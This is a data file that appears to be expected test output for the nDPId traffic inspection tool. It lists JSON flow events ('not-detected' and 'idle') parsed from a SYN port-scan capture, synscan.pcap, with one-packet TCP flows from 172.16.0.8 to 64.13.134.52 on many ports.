-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":835,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5280,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1185,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1006,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1003,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 